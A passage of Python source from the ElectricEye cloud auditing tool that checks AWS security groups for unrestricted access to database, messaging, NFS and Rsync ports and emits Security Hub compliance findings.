and cidrIpRange != "0.0.0.0/0"
):
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-memcached-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.16] Security groups should not allow unrestricted Memcached (UDP 11211) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Memcached (UDP 11211) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "memcached 1.4.2 - Memory Consumption Remote Denial of Service",
"Source": "ExploitDB",
"SourceUrl": "https://www.exploit-db.com/exploits/33850",
},
{
"Category": "BACKDOOR",
"Value": "Ubuntu: USN-4125-1 (CVE-2019-15026): Memcached vulnerability",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-15026",
},
],
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_redshift_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.17] Security groups should not allow unrestricted Redshift (TCP 5439) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "5439" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-redshift-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.17] Security groups should not allow unrestricted Redshift (TCP 5439) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Redshift (TCP 5439) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "5439" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-redshift-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.17] Security groups should not allow unrestricted Redshift (TCP 5439) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Redshift (TCP 5439) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
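# --- Illustrative sketch (not used by the checks above or below) -------------
# Every open-port check in this module repeats the same walk over
# secgroup["IpPermissions"], looking for a rule that covers a well-known port
# and is open to 0.0.0.0/0. The helper below is a minimal sketch of that shared
# predicate, assuming the permission dict shape returned by EC2
# DescribeSecurityGroups; the function name is an illustrative assumption.
def permission_is_open_to_world_example(permission, port):
    from_port = permission.get("FromPort")
    to_port = permission.get("ToPort")
    # Rules without explicit ports (e.g. protocol "-1") are skipped here
    if from_port is None or to_port is None:
        return False
    if not (from_port <= port <= to_port):
        return False
    # Open to the world when any IPv4 range is the unrestricted CIDR
    return any(r.get("CidrIp") == "0.0.0.0/0" for r in permission.get("IpRanges", []))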
@registry.register_check("ec2")
def security_group_open_documentdb_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.18] Security groups should not allow unrestricted DocumentDB (TCP 27017) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "27017" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-documentdb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.18] Security groups should not allow unrestricted DocumentDB (TCP 27017) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted DocumentDB (TCP 27017) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "27017" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-documentdb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.18] Security groups should not allow unrestricted DocumentDB (TCP 27017) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted DocumentDB (TCP 27017) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_cassandra_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.19] Security groups should not allow unrestricted Cassandra (TCP 9142) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "9142" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-cassandra-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.19] Security groups should not allow unrestricted Cassandra (TCP 9142) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Cassandra (TCP 9142) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "9142" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-cassandra-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.19] Security groups should not allow unrestricted Cassandra (TCP 9142) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Cassandra (TCP 9142) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_kafka_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.20] Security groups should not allow unrestricted Kafka streams (TCP 9092) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "9092" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-kafka-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.20] Security groups should not allow unrestricted Kafka streams (TCP 9092) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Kafka streams (TCP 9092) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "9092" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-kafka-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.20] Security groups should not allow unrestricted Kafka streams (TCP 9092) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Kafka streams (TCP 9092) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_nfs_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.21] Security groups should not allow unrestricted NFS (TCP 2049) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "2049" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-nfs-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.21] Security groups should not allow unrestricted NFS (TCP 2049) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted NFS (TCP 2049) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "2049" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-nfs-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.21] Security groups should not allow unrestricted NFS (TCP 2049) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted NFS (TCP 2049) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_rsync_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.22] Security groups should not allow unrestricted Rsync (TCP 873) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "873" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
